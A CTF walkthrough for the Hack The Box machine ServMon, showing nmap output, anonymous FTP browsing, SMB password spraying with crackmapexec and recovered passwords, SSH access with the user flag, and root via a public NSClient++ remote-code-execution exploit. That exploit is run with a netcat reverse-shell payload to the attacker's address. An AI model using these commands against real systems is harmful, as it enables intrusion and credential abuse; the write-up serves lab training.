NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 12:11 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:11
Completed NSE at 12:11, 0.00s elapsed
Initiating NSE at 12:11
Completed NSE at 12:11, 0.00s elapsed
Initiating NSE at 12:11
Completed NSE at 12:11, 0.00s elapsed
Initiating Ping Scan at 12:11
Scanning 10.10.10.184 [4 ports]
Completed Ping Scan at 12:11, 0.64s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:11
Completed Parallel DNS resolution of 1 host. at 12:11, 0.55s elapsed
Initiating SYN Stealth Scan at 12:11
Scanning 10.10.10.184 [1000 ports]
Discovered open port 139/tcp on 10.10.10.184
Discovered open port 22/tcp on 10.10.10.184
Discovered open port 80/tcp on 10.10.10.184
Discovered open port 21/tcp on 10.10.10.184
Discovered open port 445/tcp on 10.10.10.184
Discovered open port 135/tcp on 10.10.10.184
Completed SYN Stealth Scan at 12:11, 3.82s elapsed (1000 total ports)
Initiating Service scan at 12:11
Scanning 6 services on 10.10.10.184
Completed Service scan at 12:13, 129.20s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.184
Retrying OS detection (try #2) against 10.10.10.184
Initiating Traceroute at 12:13
Completed Traceroute at 12:13, 0.53s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:13
Completed Parallel DNS resolution of 2 hosts. at 12:13, 0.40s elapsed
NSE: Script scanning 10.10.10.184.
Initiating NSE at 12:13
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 12:13, 22.17s elapsed
Initiating NSE at 12:13
Completed NSE at 12:13, 1.45s elapsed
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
Nmap scan report for 10.10.10.184
Host is up (0.86s latency).
Not shown: 651 filtered ports, 343 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=6/21%Time=5EEF010B%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 7 Enterprise SP1 (92%), Microsoft Windows 8 (92%), Microsoft Windows Vista SP1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m55s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-21T06:48:29
|_ start_date: N/A
TRACEROUTE (using port 995/tcp)
HOP RTT ADDRESS
1 521.41 ms 10.10.14.1
2 521.53 ms 10.10.10.184
NSE: Script Post-scanning.
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.22 seconds
Raw packets sent: 1836 (84.788KB) | Rcvd: 453 (21.422KB)
FTP LOGINS AND ENUMERATION
Since nmap identified that anonymous FTP was permitted, I’ll grab all of the files there with wget -r ftp://anonymous:@10.10.10.184 (this would be not a great idea on a real server where I’d be tons of stuff, but works well for a CTF like HTB). There were two files:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd Users
250 CWD command successful.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.
ftp> cd ../Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
01-18-20 12:10PM 186 Notes to do.txt
226 Transfer complete.
ftp>
SMB ENUMERATION
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #smbclient -L 10.10.10.184
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_ACCESS_DENIED
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #
WEBSITE ENUMEARTION
CRACKING PASSWORDS
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ # crackmapexec smb 10.10.10.184 -u nathan -p pass.txt
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ # crackmapexec smb 10.10.10.184 -u nadine -p pass.txt
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] SERVMON\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [+] SERVMON\nadine:L1k3B1gBut7s@W0rk
SSH LOGIN USER ACCESS
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
nadine@SERVMON C:\Users\Nadine>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine
08/04/2020 23:16 <DIR> .
08/04/2020 23:16 <DIR> ..
18/01/2020 11:23 <DIR> 3D Objects
18/01/2020 11:23 <DIR> Contacts
08/04/2020 22:28 <DIR> Desktop
08/04/2020 22:28 <DIR> Documents
18/01/2020 11:23 <DIR> Downloads
08/04/2020 22:27 <DIR> Favorites
08/04/2020 22:27 <DIR> Links
18/01/2020 11:23 <DIR> Music
18/01/2020 11:31 <DIR> OneDrive
18/01/2020 11:23 <DIR> Pictures
18/01/2020 11:23 <DIR> Saved Games
18/01/2020 11:23 <DIR> Searches
18/01/2020 11:23 <DIR> Videos
0 File(s) 0 bytes
15 Dir(s) 27,858,857,984 bytes free
nadine@SERVMON C:\Users\Nadine>cd Desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine\Desktop
08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
21/06/2020 08:06 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 27,859,218,432 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
1ef91a525ec2fab2d6a65fc0a385d66f
nadine@SERVMON C:\Users\Nadine\Desktop>
GETTING ROOT ACCESS
NSClient++ exploit was not working for me in browser so I used this one!!
─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #searchsploit nsclient
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation | windows/local/46802.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #searchsploit -m json/webapps/48360.txt
Exploit: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
URL: https://www.exploit-db.com/exploits/48360
Path: /usr/share/exploitdb/exploits/json/webapps/48360.txt
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /root/Desktop/HTB/servmon/48360.txt
┌─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #
Exploiting it using script
┌─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #mv 48360.txt exploit.py
┌─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #chmod +x exploit.py
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #python3 exploit.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "c:/temp/nc.exe 10.10.14.12 9009 -e cmd.exe"
[!] Targeting base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: nnXjfcSwKTn)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .
[!] Timeout exceeded. Assuming your payload executed . . .
Listening over the given port
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.184] 49940
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
